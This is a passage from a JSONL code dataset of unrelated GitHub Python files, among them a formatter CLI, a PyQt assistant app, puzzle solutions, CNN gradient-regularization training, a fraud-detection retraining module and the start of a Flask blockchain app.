model_loaded, image_data):\n final_json = []\n if model == \"dia\":\n preds, pred_val = retinopathy.translate_retinopathy(\n model_loaded[\"model\"].predict_proba(image_data)\n )\n final_json.append(\n {\n \"empty\": False,\n \"type\": model_loaded[\"type\"],\n \"mild\": preds[0],\n \"mod\": preds[1],\n \"norm\": preds[2],\n \"severe\": preds[3],\n \"pred_val\": pred_val,\n }\n )\n elif model == \"oct\":\n preds, pred_val = cardiac.translate_oct(\n model_loaded[\"model\"].predict(image_data)\n )\n final_json.append(\n {\n \"empty\": False,\n \"type\": model_loaded[\"type\"],\n \"cnv\": preds[0],\n \"dme\": preds[1],\n \"drusen\": preds[2],\n \"normal\": preds[3],\n \"pred_val\": pred_val,\n }\n )\n\n elif model == \"mal\":\n preds, pred_val = malaria.translate_malaria(\n model_loaded[\"model\"].predict_proba(image_data)\n )\n final_json.append(\n {\n \"empty\": False,\n \"type\": model_loaded[\"type\"],\n \"para\": preds[0],\n \"unin\": preds[1],\n \"pred_val\": pred_val,\n }\n )\n\n else:\n warn = (\n \"Feeding blank image won't work. Please enter an input image to continue.\"\n )\n pred_val = \" \"\n final_json.append(\n {\n \"pred_val\": warn,\n \"para\": \" \",\n \"unin\": \" \",\n \"tumor\": \" \",\n \"can\": \" \",\n \"normal\": \" \",\n \"bac\": \" \",\n \"viral\": \" \",\n \"cnv\": \" \",\n \"dme\": \" \",\n \"drusen\": \" \",\n \"mild\": \" \",\n \"mod\": \" \",\n \"severe\": \" \",\n \"norm\": \" \",\n \"top1\": \" \",\n \"top2\": \" \",\n \"top3\": \" \",\n \"top4\": \" \",\n \"top5\": \" \",\n }\n )\n\n K.clear_session()\n result = jsonable_encoder(final_json[0])\n return result\n","repo_name":"ahrazarfi/api-medai","sub_path":"prediction_Handler.py","file_name":"prediction_Handler.py","file_ext":"py","file_size_in_byte":2403,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"27597467584","text":"\"\"\"Console script for globality_black.\"\"\"\nimport multiprocessing as mp\nimport sys\nfrom functools import partial\nfrom pathlib import Path\nfrom typing import Tuple\n\nimport click\n\nfrom globality_black.black_handler import get_black_mode\nfrom globality_black.constants import (\n ALL_DONE_STRING,\n NUM_FILES_TO_ENABLE_PARALLELIZATION,\n OH_NO_STRING,\n)\nfrom globality_black.diff import text_diff\nfrom globality_black.reformat_text import BlackError, reformat_text\n\n\n@click.command()\n@click.argument(\"path\", type=click.Path(readable=True, writable=True, exists=True))\n@click.option(\"--check/--no-check\", type=bool, default=False)\n@click.option(\"--verbose/--no-verbose\", type=bool, default=False)\n@click.option(\"--diff/--no-diff\", type=bool, default=False)\n# characters \\b needed to avoid click reformatting\n# see https://click.palletsprojects.com/en/7.x/documentation/#preventing-rewrapping\ndef main(path, check, diff, verbose):\n \"\"\"\n Run globality-black for a given path\n\n \\b\n * path:\n If path is a directory, apply to all .py files in any subdirectory\n Otherwise, apply just to the given filename.\n\n \\b\n * check:\n If --check is passed, do not modify the files and return:\n - exit code 1: if any file needs to be reformatted (or fails when applying black)\n - exit code 0: otherwise\n \\b\n If --check not passed (or --no-check is passed), attempt to reformat all paths returning\n - exit code 1: if any file fails\n - exit code 0: otherwise\n \\b\n Note that when not passing --check, all files not failing will be correctly reformatted\n (i.e. globality-black is independently applied per-file)\n\n \\b\n * verbose:\n If --verbose not passed (or --no-verbose), only files with errors or to be modified are\n shown\n\n \\b\n * diff:\n If --diff, do not modify the files and display the changes induced by reformatting\n\n \"\"\"\n\n path = Path(path)\n exit_code = 0\n if diff:\n check = True\n if path.is_dir():\n paths = list(path.glob(\"**/*.py\"))\n else:\n paths = [path]\n\n reformatted_count, failed_count = 0, 0\n process_path_with_check = partial(process_path, check_only_mode=check, diff_mode=diff)\n\n parallelize = len(paths) > NUM_FILES_TO_ENABLE_PARALLELIZATION\n if parallelize:\n with mp.Pool(mp.cpu_count() - 1) as pool:\n map_result = pool.map(process_path_with_check, paths)\n else:\n # Do not parallelize if just a few files\n map_result = map(process_path_with_check, paths)\n\n for is_modified, is_failed, message in map_result:\n if verbose or is_modified or is_failed:\n click.echo(message)\n reformatted_count += is_modified\n failed_count += is_failed\n\n unchanged_count = len(paths) - reformatted_count - failed_count\n\n # add a separator line\n click.echo(\"-\" * len(OH_NO_STRING))\n\n # if we are just checking and at least one file needs to be reformatted OR some file failed\n if (check and reformatted_count > 0) or failed_count > 0:\n click.echo(OH_NO_STRING)\n exit_code = 1\n if failed_count > 0:\n click.echo(f\"{failed_count} files failed to parse (black error)\")\n else:\n click.echo(ALL_DONE_STRING)\n\n if check:\n if reformatted_count > 0:\n click.echo(f\"{reformatted_count} files would be reformatted\")\n if unchanged_count > 0:\n click.echo(f\"{unchanged_count} files would be left unchanged\")\n else:\n if reformatted_count > 0:\n click.echo(f\"{reformatted_count} files reformatted\")\n if unchanged_count > 0:\n click.echo(f\"{unchanged_count} files unchanged\")\n\n sys.exit(exit_code)\n\n\ndef process_path(\n path: Path,\n check_only_mode: bool = False,\n diff_mode: bool = False,\n) -> Tuple[bool, bool, str]:\n \"\"\"\n For each path compute `is_modified`, `is_failed`, and `message` to be used in main\n \"\"\"\n\n is_modified = False\n input_code = path.read_text()\n black_mode = get_black_mode(path)\n diff_output = \"\"\n try:\n output_code = reformat_text(input_code, black_mode)\n except BlackError as e:\n return False, True, f\"Failed to reformat {path}. {e}\"\n\n if input_code != output_code:\n is_modified = True\n\n if check_only_mode and is_modified:\n if diff_mode:\n diff_output = text_diff(path, output_code)\n diff_output = f\"\\nDiff for {path} \\n\" + diff_output\n initial_str = \"Would reformat\"\n elif not check_only_mode and is_modified:\n initial_str = \"Reformatted\"\n else:\n initial_str = \"Nothing to do for\"\n\n if not check_only_mode:\n path.write_text(output_code)\n if diff_mode:\n # if diff we add the diff report to the reformat message\n output = diff_output + \"\\n\" + f\"{initial_str} {path}\"\n else:\n output = f\"{initial_str} {path}\"\n return is_modified, False, output\n\n\nif __name__ == \"__main__\":\n sys.exit(main()) # type: ignore # pragma: no cover\n","repo_name":"tpietruszka/globality-black","sub_path":"globality_black/cli.py","file_name":"cli.py","file_ext":"py","file_size_in_byte":5072,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"4286718447","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon May 21 20:41:38 2018\n\n@author: Benjamin Rosa\n\"\"\"\nimport sys\nimport Constants\nfrom PyQt5.QtCore import pyqtSlot, Qt\nfrom PyQt5.QtWidgets import QWidget, QPushButton, QDesktopWidget, QApplication, QListWidget, QLabel\nfrom CommandThread import StartActionThread\nfrom Util import JsonFileUtil\nfrom Speaker import AssistantSpeaker\n\n# This class setup the UI part of the application\nclass AssistantApp(QWidget):\n \n def __init__(self, app):\n super().__init__()\n self.title = 'Personal Assistant'\n self.left = 10\n self.top = 10\n self.width = 310\n self.height = 250\n self.command_thread = StartActionThread()\n self.command_thread.signal.connect(self.on_thread_finished)\n self.speaker = AssistantSpeaker()\n self.app = app\n self.initUI()\n \n def initUI(self):\n # Initialize window running the app\n self.setWindowTitle(self.title)\n self.setGeometry(self.left, self.top, self.width, self.height)\n \n # Start the application at the center of the screen\n qtRectangle = self.frameGeometry()\n center_point = QDesktopWidget().availableGeometry().center()\n qtRectangle.moveCenter(center_point)\n self.move(qtRectangle.topLeft())\n \n # Initialize start button\n self.start_button = QPushButton('Speak', self)\n self.start_button.resize(250, 50)\n self.start_button.move(30,180)\n self.start_button.setStyleSheet('font:bold;font-size:30px;')\n self.start_button.clicked.connect(self.on_start_click)\n \n # Command list title\n self.command_list_title = QLabel(\"Command list\", self)\n self.command_list_title.setStyleSheet('font:bold;font-size:30px;')\n self.command_list_title.resize(250,50)\n self.command_list_title.move(20,5)\n self.command_list_title.setAlignment(Qt.AlignCenter)\n\n # Command list\n self.commandList = QListWidget(self)\n self.commandList.resize(150,110)\n self.commandList.move(75,60)\n self.commandList.addItem(\"All commands\")\n self.commandList.addItem(\"Change parameters\")\n self.commandList.addItem(\"Weather\")\n self.commandList.addItem(\"Time\")\n self.commandList.addItem(\"Save meeting\")\n self.commandList.addItem(\"Remind meetings\")\n self.commandList.addItem(\"Help\")\n \n self.welcomingUser()\n self.show()\n \n def closeEvent(self, event):\n sys.exit(self.app.exec_())\n \n def on_thread_finished(self):\n self.start_button.setEnabled(True)\n QApplication.setOverrideCursor(Qt.ArrowCursor)\n self.command_thread.terminate()\n self.command_thread = StartActionThread()\n self.command_thread.signal.connect(self.on_thread_finished)\n \n @pyqtSlot()\n def on_start_click(self):\n self.start_button.setEnabled(False)\n QApplication.setOverrideCursor(Qt.WaitCursor)\n self.command_thread.start()\n \n def welcomingUser(self):\n jsonFile = JsonFileUtil(Constants.APP_PROPERTIES_FILENAME, Constants.APP_PROPERTIES_PATH)\n userName = jsonFile.getValue(\"user name\")\n self.speaker.say(\"Welcome \" + userName)\n ","repo_name":"BenjaminBenoit/AssistantVocal","sub_path":"AssistantApp.py","file_name":"AssistantApp.py","file_ext":"py","file_size_in_byte":3265,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"41371480698","text":"import collections\n\ndef ans(words):\n mose = [\".-\",\"-...\",\"-.-.\",\"-..\",\".\",\"..-.\",\"--.\",\"....\",\"..\",\".---\",\"-.-\",\".-..\",\"--\",\"-.\",\"---\",\".--.\",\"--.-\",\".-.\",\"...\",\"-\",\"..-\",\"...-\",\".--\",\"-..-\",\"-.--\",\"--..\"]\n hist = collections.defaultdict(int)\n for w in words:\n rst = \"\"\n for c in w:\n rst += mose[ord(c) - ord('a')]\n hist[rst] += 1\n return len(hist.keys())\n\nclass Solution(object):\n def uniqueMorseRepresentations(self, words):\n \"\"\"\n :type words: List[str]\n :rtype: int\n \"\"\"\n return ans(words)\n","repo_name":"gsrr/leetcode","sub_path":"leetcode/804. Unique Morse Code Words.py","file_name":"804. Unique Morse Code Words.py","file_ext":"py","file_size_in_byte":575,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"38714898712","text":"\"\"\"\nProblem:\n\nGiven a string of parentheses, write a function to compute the minimum number of\nparentheses to be removed to make the string valid (i.e. each open parenthesis is\neventually closed).\n\nFor example, given the string \"()())()\", you should return 1. Given the string \")(\",\nyou should return 2, since we must remove all of them.\n\"\"\"\n\nfrom copy import deepcopy\n\nfrom DataStructures.Stack import Stack\n\n\ndef get_min_parentheses_remove(\n expression: str, stack: Stack = Stack(), num_removed: int = 0\n) -> int:\n if not expression and stack.is_empty():\n return num_removed\n elif not expression:\n return len(stack) + num_removed\n if (expression[0] == \")\") and (not stack.is_empty() and stack.peek() == \"(\"):\n stack.pop()\n return get_min_parentheses_remove(expression[1:], stack, num_removed)\n # calulating the modifications for parenthesis added to stack\n stack_copy = deepcopy(stack)\n stack_copy.push(expression[0])\n modifications_parenthesis_added_to_stack = get_min_parentheses_remove(\n expression[1:], stack_copy, num_removed\n )\n # calulating the modifications for parenthesis removed\n modifications_parenthesis_ignored = get_min_parentheses_remove(\n expression[1:], stack, num_removed + 1\n )\n return min(\n modifications_parenthesis_added_to_stack, modifications_parenthesis_ignored\n )\n\n\nif __name__ == \"__main__\":\n print(get_min_parentheses_remove(\"()())()\"))\n print(get_min_parentheses_remove(\")(\"))\n\n\n\"\"\"\nSPECS:\n\nTIME COMPLEXITY: O(2 ^ n)\nSPACE COMPLEXITY: O(n)\n\"\"\"\n","repo_name":"ruppysuppy/Daily-Coding-Problem-Solutions","sub_path":"Solutions/086.py","file_name":"086.py","file_ext":"py","file_size_in_byte":1573,"program_lang":"python","lang":"en","doc_type":"code","stars":444,"dataset":"github-code","pt":"67"} +{"seq_id":"106872774","text":"from model import *\nimport torch\n\n\ndef regularized_train(dataloader, model, loss_fn, optimizer, device, lmbda):\n \"\"\"\n\n :param dataloader: training dataloader\n :param model: CNN model\n :param lmbda: penalty strength\n \"\"\"\n\n size = len(dataloader.dataset)\n model.train()\n for batch, (X, y) in enumerate(dataloader):\n X, y = X.to(device), y.to(device)\n X.requires_grad_()\n\n # Compute prediction error\n pred = model(X)\n loss = loss_fn(pred, y)\n\n # Backpropagation and gradient regularization\n optimizer.zero_grad()\n grad = torch.autograd.grad(loss, X, retain_graph=True)[0]\n grad_norm = torch.norm(grad)\n loss += lmbda * grad_norm.mean()\n loss.backward()\n optimizer.step()\n\n if batch % 100 == 0:\n loss, current = loss.item(), (batch + 1) * len(X)\n print(f\"loss: {loss:>7f} [{current:>5d}/{size:>5d}]\")\n\n\nif __name__ == '__main__':\n\n print('Gradients Regularization\\n')\n\n learning_rate = 0.00005\n train_dataloader, test_dataloader, device = init_data()\n regularized_cnn = CNN().to(device)\n regularized_cnn.load_state_dict(torch.load(\"models/regularized_L1000_CNN.pth\"))\n\n loss_fn = nn.CrossEntropyLoss()\n optimizer = torch.optim.Adam(regularized_cnn.parameters(), lr=learning_rate)\n\n lmbda = 1000\n epochs = 10\n for t in range(epochs):\n print(f\"Epoch {t + 1}\\n-------------------------------\")\n regularized_train(dataloader=train_dataloader, model=regularized_cnn, loss_fn=loss_fn, optimizer=optimizer,\n device=device, lmbda=lmbda)\n test(test_dataloader, regularized_cnn, loss_fn, device)\n print(\"Done!\")\n\n # save model\n torch.save(regularized_cnn.state_dict(), \"models/regularized_L1000_CNN.pth\")\n print(\"Saved PyTorch Model State to regularized_L1000_CNN.pth\")\n\n test(test_dataloader, regularized_cnn, loss_fn, device)\n print(\"Done!\")\n","repo_name":"GxxxMiii/AdvCNN","sub_path":"gradients_regularization.py","file_name":"gradients_regularization.py","file_ext":"py","file_size_in_byte":1962,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"6280008445","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\ndescription: get-list-of-all-column-headings\nversion: 0.0.1\ncreated: 2018-10-23\nauthor: Ed Nykaza\ndependencies:\n * donor json data\nlicense: BSD-2-Clause\n\"\"\"\n\n\n# %% REQUIRED LIBRARIES\nimport os\nimport sys\nimport pandas as pd\nimport datetime as dt\nimport argparse\nimport time\n# load tidals package locally if it does not exist globally\nimport importlib\nif importlib.util.find_spec(\"tidals\") is None:\n tidalsPath = os.path.abspath(os.path.join(os.path.dirname(__file__),\n \"..\", \"..\", \"tidepool-analysis-tools\"))\n if tidalsPath not in sys.path:\n sys.path.insert(0, tidalsPath)\nimport tidals as td\n\n\n# %% CODE METADATA\nstartTime = time.time()\nprint(\"starting at \" + dt.datetime.now().strftime(\"%Y-%m-%d %H:%M:%S\"))\n\n\n# %% USER INPUTS\ncodeDescription = \"A batch processing or wrapper script to get a list of all column headings\"\nparser = argparse.ArgumentParser(description=codeDescription)\n\nparser.add_argument(\"-d\",\n \"--date-stamp\",\n dest=\"dateStamp\",\n default=dt.datetime.now().strftime(\"%Y-%m-%d\"),\n help=\"date in '%Y-%m-%d' format needed to call unique \" +\n \"donor list (e.g., PHI-2018-03-02-uniqueDonorList)\")\n\nargs = parser.parse_args()\n\n\n# %% SET UP PATHS\ndataPath = os.path.abspath(os.path.join(os.path.dirname(__file__),\n \"..\", \"data\", \"PHI-\" + args.dateStamp + \"-donor-data\"))\n\ndonorInfoPath = os.path.join(dataPath, \"PHI-\" + args.dateStamp + \"-uniqueDonorList.csv\")\ndonors = td.load.load_csv(donorInfoPath)\njsonDataPath = os.path.join(dataPath, \"PHI-\" + args.dateStamp + \"-donorJsonData\")\n\n\n# %% FUNCTIONS\nuniqueColHeadings = set()\ni = 0\nfor dIndex in donors.index:\n userID = donors.userID[dIndex]\n fileName = \"PHI-\" + str(userID)\n jsonFileName = os.path.join(jsonDataPath, fileName + \".json\")\n fileSize = os.stat(jsonFileName).st_size\n if fileSize > 1000:\n i = i + 1\n data = td.load.load_json(jsonFileName)\n uniqueColHeadings = uniqueColHeadings.union(set(list(data)))\n print(i, len(list(uniqueColHeadings)))\n\nallCols = pd.DataFrame(list(uniqueColHeadings), columns=[\"colHeading\"])\nallCols = allCols.sort_values(by=\"colHeading\").reset_index(drop=True)\nallCols.to_csv(\"all-col-headings-\" + args.dateStamp + \".csv\")\n\n\n# %% CODE METADATA\nendTime = time.time()\nprint(\"finshed at \" + dt.datetime.now().strftime(\"%Y-%m-%d %H:%M:%S\"))\nprint(\"total duration was \" + str(round((endTime - startTime) / 60, 1)) + \" minutes\")\n","repo_name":"rpwils/data-analytics","sub_path":"projects/bigdata-processing-pipeline/get-donor-data/get-all-col-headings.py","file_name":"get-all-col-headings.py","file_ext":"py","file_size_in_byte":2586,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"67"} +{"seq_id":"31986912745","text":"#!/usr/bin/env python\n# Cphryigot: O.R.Senthil Kumaran \n#\n# Inrpeisd from jwz scrmable: http://www.jwz.org/hacks/scrmable.pl\n#\n# Tihs pgrarom is fere sortfwae; you can rrtiestiubde it ad/onr mdfioy\n# it udenr the tmers of the GNU Graneel Pbuilc Liscene as phlibsued by\n# the Fere Sfwartoe Fanouiodtn; eeihtr vierosn 2 of the Liscene, or\n# (at your opotin) any leatr vierosn.\n#\n# Tihs pgrarom is diisertbtud in the hope taht it will be uusfel,\n# but WTHOIUT ANY WRAANRTY; whitout eevn the iipemld watrarny of\n# MNTIBRAEAHCITLY or FNTIESS FOR A PTULACRIAR PURPSOE. See the\n# GNU Graneel Pbuilc Liscene for mroe dalites.\n#\n# You suolhd have reievced a copy of the GNU Graneel Pbuilc Liscene\n# along wtih tihs pgrarom; if not, wtire to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA\n\nimport random\nimport sys\n\n\ndef mxiup(ecah_wrod):\n if len(ecah_wrod) <= 2:\n return ecah_wrod\n else:\n nwewrod = ecah_wrod[0]\n if ecah_wrod[-1] in ['.', ',', ':', ';', '-', '?', '!']:\n inbet = ecah_wrod[1:-2]\n for each in random.sample(list(inbet), len(inbet)):\n nwewrod += each\n nwewrod += ecah_wrod[-2]\n else:\n inbet = ecah_wrod[1:-1]\n for each in random.sample(list(inbet), len(inbet)):\n nwewrod += each\n nwewrod += ecah_wrod[-1]\n return nwewrod\n\n\ndef srcambel(line):\n mixedwrods = []\n wrods = line.split()\n for ecah_wrod in wrods:\n mixedwrods.append(mxiup(ecah_wrod))\n for w, m in zip(wrods, mixedwrods):\n line = line.replace(w, m)\n print(line, end='')\n\n\ndef getgraparaph():\n line = sys.stdin.read()\n return line\n\n\ndef mian():\n try:\n line = getgraparaph()\n srcambel(line)\n except (EOFError, KeyboardInterrupt):\n sys.exit(0)\n\n\nmian()\n","repo_name":"uthcode/learntosolveit","sub_path":"languages/python/algorithm_scrmable.py","file_name":"algorithm_scrmable.py","file_ext":"py","file_size_in_byte":1875,"program_lang":"python","lang":"en","doc_type":"code","stars":161,"dataset":"github-code","pt":"67"} +{"seq_id":"33731412782","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Jun 25 21:47:06 2020\n\n@author: Bjarne\n\"\"\"\nimport pandas as pd\nimport numpy as np\nimport sys\nsys.path.append(\"..\")\nfrom RequestHandlerData import ORM_Datamodel as ORM\nfrom sklearn.model_selection import GridSearchCV\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.metrics import classification_report\nfrom sklearn.metrics import f1_score\nfrom datetime import datetime\nfrom joblib import dump\nimport MLAlgorithm as MLAlgo\n \nclass DataHandler:\n \n def __init__(self):\n \"\"\"\n Es wird der Datensatz aus der Datenbank bezogen und\n im folgenden an die Klasse \"Training\" übergeben.\n\n Returns\n -------\n None.\n\n \"\"\"\n # Daten aus der Datenbank abfragen\n self.X = pd.read_sql_table('Transaction_preprocessed', ORM.connection_string).set_index(\"tx_id\").sort_index()\n self.y = pd.read_sql_table('Transaction_Rating', ORM.connection_string).set_index(\"tx_id\").sort_index()\n \n def FilterData(self):\n \"\"\"\n Der Datensatz wird gefiltert, da die IsFraud-Variable direkt nach\n der Transaktion zwar in der Tabelle \"Transaction_Rating\"\n geschrieben wird, aber die Spalte \"isFraud\" zum Transaktionszeitpunkt\n nicht bekannt ist. Jene Einträge, dessen Ausprägung noch nicht bekannt ist,\n wird entfernt.\n\n Returns\n -------\n None\n\n \"\"\"\n self.X = self.X[self.y.isFraud != np.nan]\n self.y = self.y[self.y.isFraud != np.nan][\"isFraud\"]\n \n def SplitData(self):\n \"\"\"\n Test-Train-Split durchführen. \n Die Testdaten werden als validierung verwendet, nach der Durchführung\n der GridSearch. Es wird also indirekt ein 3-Fold-Split eingeleitet.\n \n Der Parameter shuffle=False der Funktion train_test_split, wird\n verwendet, um keine Data Leakage zu erhalten durch beispielswiese,\n Betrüger, die mehrere illegale Transaktionen ausführen.\n \n Returns\n -------\n None.\n\n \"\"\"\n self.X_train, self.X_test, self.y_train, self.y_test = train_test_split(\\\n self.X, self.y, train_size=0.8, random_state=42,\\\n shuffle=False)\n \n def Process(self):\n self.FilterData()\n self.SplitData()\n \n \nclass Training:\n \n def __init__(self, isTuned, Model, params, DataHandler=DataHandler, threshold=0.5):\n \"\"\"\n Diese Klasse koordiniert das Training. Es wird entschieden, ob das Modell\n in der finalen Form vorliegt oder Parametertuning durchgeführt werden muss,\n dabei ist die Klasse mit verschiedenen Modellen und Parameterpaaren,\n verwendbar.\n\n Parameters\n ----------\n isTuned : bool\n Rückschluss darüber, ob das Parametertuning notwendig ist.\n \n Model : class\n Enthält ML-Algorithmus, welcher verwendet werden soll.\n \n params : dict\n Enthält entweder Parameterpaare, sofern isTuned == False ist,\n oder aber die zu verwendenden Parameter für das finale Modell\n \n DataHandler : class\n Übergabe der DataHandler-Classe, um die Daten verarbeiten zu können.\n \n threshold : float\n Beschreibt den Grenzwert, ab welcher Wahrscheinlichkeit, eine \n Transaktion als Fraud geflaggt wird.\n \n Returns\n -------\n None.\n \"\"\"\n self.isTuned = isTuned\n self.Model = Model\n self.params = params\n self.DataHandler = DataHandler()\n self.threshold = threshold\n # Datenaufbereitung und split durchführen\n self.DataHandler.Process()\n \n def Process(self):\n \"\"\"\n Unterscheidung danach, ob das Modell bereits optimiert worden ist.\n Ist dies nicht der Fall, wird die GridSearch eingeleitet, welche\n dann mit dem finalen Modell \n\n Returns\n -------\n None.\n\n \"\"\"\n if self.isTuned == True:\n # Train Model\n model = self.Model(n_jobs=-1, **self.params)\n model.fit(self.DataHandler.X, self.DataHandler.y)\n \n # Save model to storage \n dump(model, './ModelStorage/saved_model.pkl')\n else:\n # Wenn die Parameter nicht optimiert worden sind, leite GridSearch ein\n self.test = GridSearchTuning(self)\n self.test.Process()\n \nclass GridSearchTuning:\n \n def __init__(self, TrainingInstance,\\\n threshold_metric = 0.98):\n \"\"\"\n \n\n Parameters\n ----------\n TrainingInstance : class\n Beschreibt eine Instanz der Training-Klasse. So werden\n Parametr ausgetauscht und können von dieser Klasse aus verändert werden.\n Wird benötigt, um das Optimale Parameterpaar zu inserten.\n \n threshold_metric : Schwellwert der Zielmetrik, optional\n Dieser Wert beschreibt den Schwellwert, ab dem ein Modell als \"gut genug\",\n gilt. The default is 0.98.\n\n Returns\n -------\n None.\n\n \"\"\"\n # Übertragen der Parameter aus der Trainingsinstanz\n self.TrainingInstance = TrainingInstance\n self.X_train = TrainingInstance.DataHandler.X_train\n self.X_test = TrainingInstance.DataHandler.X_test\n self.y_train = TrainingInstance.DataHandler.y_train\n self.y_test = TrainingInstance.DataHandler.y_test\n self.threshold = TrainingInstance.threshold\n self.Model = TrainingInstance.Model\n self.params = TrainingInstance.params\n \n # Wir evaluieren das Modell auf der durchschnittlichen Präzision,\n # um eine verfälschung durch Imbalanced Data zu verhindern.\n # Es ist bewusst der durchschnittliche Wert verwendet worden,\n # da auch False Negatives einen Imageschaden verursachen.\n self.GridSearch = GridSearchCV(self.Model(), self.params, cv=2, n_jobs=-1, scoring='f1')\n \n # Schwellwerte übertragen\n self.threshold_metric = threshold_metric\n \n def ModelSelection(self):\n \"\"\"\n Durchführen des eigentlichen Parametertunings und\n Rückgabe des besten auf Basis der Traininsdatensatzes.\n\n Returns\n -------\n None.\n\n \"\"\"\n self.GridSearch.fit(self.X_train, self.y_train)\n \n def ModelValidation(self):\n \"\"\"\n Validierung des Modells und zulassen des Modells, sofern\n die Schwellwerte nicht verletzt worden sind. \n \n Returns\n -------\n None.\n\n \"\"\"\n self.validation_model = self.Model(n_jobs=-1, **self.GridSearch.best_params_)\n self.validation_model.fit(self.X_train, self.y_train)\n \n y_pred = self.validation_model.predict_proba(self.X_test)\n # Wahrscheinlichkeiten in binäre Aussage umwandeln\n y_pred_binary = [y[1] >= self.threshold for y in y_pred]\n \n # F1-Score ermitteln erstellen \n metric = f1_score(self.y_test, y_pred_binary)\n \n # Modellreport erstellen, um Modellgüte nachvollziehbar zu dokumentieren\n report = pd.DataFrame(classification_report(self.y_test, y_pred_binary, output_dict=True))\n report.to_csv(f\"./ModelReport/report{str(datetime.now()).replace(':','-')}.csv\")\n\n if self.threshold_metric <= metric:\n # Anpassen der Parameter der Trainingsinstanz\n self.TrainingInstance.isTuned = True\n self.TrainingInstance.params = self.GridSearch.best_params_\n # Trainieren und speichern des finalen Models\n self.TrainingInstance.Process()\n else:\n raise Exception(\"\"\"Modelgüte nicht ausreichend. Prozess terminiert.\n Das bestehende Modell wird beibehalten\"\"\")\n\n def Process(self):\n \"\"\"\n Automatisiertes durchführen der benötigten Schritte\n \"\"\"\n self.ModelSelection()\n self.ModelValidation()\n\n","repo_name":"GeorgSchieck/Next-Level-Fraud-Detection","sub_path":"project_code/fraud_detector/RequestHandlerModel/Retrain.py","file_name":"Retrain.py","file_ext":"py","file_size_in_byte":8171,"program_lang":"python","lang":"de","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"42955038043","text":"from runners.common.branch_utils import get_branch_specific_objects\nfrom runners.interface import BaseRunner\n\n\ndef _run_fn(fn, args):\n if isinstance(args, (list, tuple)):\n return fn(*args)\n elif isinstance(args, dict):\n return fn(**args)\n else:\n return fn(args)\n\n\nclass DefaultSiamFCEvaluator(BaseRunner):\n def __init__(self):\n self.data_pipeline_on_host = None\n self.tracker_evaluator = None\n\n self.branch_name = None\n\n def switch_branch(self, branch_name):\n self.branch_name = branch_name\n\n def train(self, is_train):\n assert not is_train, \"Evaluator can only be run in evaluation mode\"\n\n def get_iteration_index(self):\n return None\n\n def get_metric_definitions(self):\n metric_definitions = []\n data_pipelines = get_branch_specific_objects(self, self.branch_name, 'data_pipeline_on_host')\n for data_pipeline in data_pipelines:\n if hasattr(data_pipeline, 'get_metric_definitions'):\n metric_definitions.append(data_pipeline.get_metric_definitions())\n if self.tracker_evaluator is not None:\n if hasattr(self.tracker_evaluator, 'get_metric_definitions'):\n metric_definitions.append(self.tracker_evaluator.get_metric_definitions())\n if len(metric_definitions) == 0:\n metric_definitions = None\n\n return metric_definitions\n\n def run_iteration(self, model, data):\n samples, targets, miscellanies_on_host, miscellanies_on_device = data\n assert self.branch_name is not None\n data_pipeline_on_host = get_branch_specific_objects(self, self.branch_name, 'data_pipeline_on_host')\n tracker_evaluator = get_branch_specific_objects(self, self.branch_name, 'tracker_evaluator')\n\n if data_pipeline_on_host is not None:\n for data_pipeline in data_pipeline_on_host:\n if hasattr(data_pipeline, 'pre_processing'):\n samples, targets, miscellanies_on_host, miscellanies_on_device = data_pipeline.pre_processing(samples, targets, miscellanies_on_host, miscellanies_on_device)\n\n outputs = None\n if tracker_evaluator is None:\n if samples is not None:\n outputs = _run_fn(samples, samples)\n else:\n initialization_samples = tracker_evaluator.pre_initialization(\n samples, targets, miscellanies_on_host, miscellanies_on_device)\n tracker_initialization_results = None\n if initialization_samples is not None:\n tracker_initialization_results = _run_fn(model.initialize, initialization_samples)\n tracking_samples = tracker_evaluator.on_initialized(tracker_initialization_results)\n if tracking_samples is not None:\n outputs = _run_fn(model.track, tracking_samples)\n outputs = tracker_evaluator.post_tracking(outputs)\n\n if data_pipeline_on_host is not None:\n for data_pipeline in reversed(data_pipeline_on_host):\n if hasattr(data_pipeline, 'post_processing'):\n outputs = data_pipeline.post_processing(outputs)\n\n def register_data_pipelines(self, branch_name, data_pipelines):\n if 'data_pipeline' in data_pipelines:\n if self.data_pipeline_on_host is None:\n self.data_pipeline_on_host = {}\n if branch_name not in self.data_pipeline_on_host:\n self.data_pipeline_on_host[branch_name] = []\n for data_pipeline in data_pipelines['data_pipeline']:\n self.data_pipeline_on_host[branch_name].append(data_pipeline)\n if 'tracker_evaluator' in data_pipelines:\n if self.tracker_evaluator is None:\n self.tracker_evaluator = {}\n assert branch_name not in self.tracker_evaluator\n self.tracker_evaluator[branch_name] = data_pipelines['tracker_evaluator']\n","repo_name":"LitingLin/SwinTrack","sub_path":"runners/evaluation/default.py","file_name":"default.py","file_ext":"py","file_size_in_byte":3928,"program_lang":"python","lang":"en","doc_type":"code","stars":224,"dataset":"github-code","pt":"67"} +{"seq_id":"3380113125","text":"import os\nfrom uuid import uuid4\nfrom flask import Flask, jsonify, request\n\nfrom .cryptocurrency.cryptocurrency import Blockchain\n\napp = Flask(__name__)\n\nnode_address = str(uuid4()).replace('-', '')\n\nblockchain = Blockchain()\n\nminer = os.getenv('MINER')\n\n\n@app.route('/get_chain', methods=['GET'])\ndef get_chain():\n response = {'chain': blockchain.chain, 'length': len(blockchain.chain)}\n return response, 200\n\n\n@app.route('/mine_block', methods=['GET'])\ndef mine_block():\n \"\"\"\n The blockchain is public. In this case everyone has access\n to the chain. If you want to mine it you can.\n \"\"\"\n\n # Access the last item in the chain\n previous_block = blockchain.get_previous_block()\n\n # This is what you need for mining\n previous_proof = previous_block['proof']\n\n # 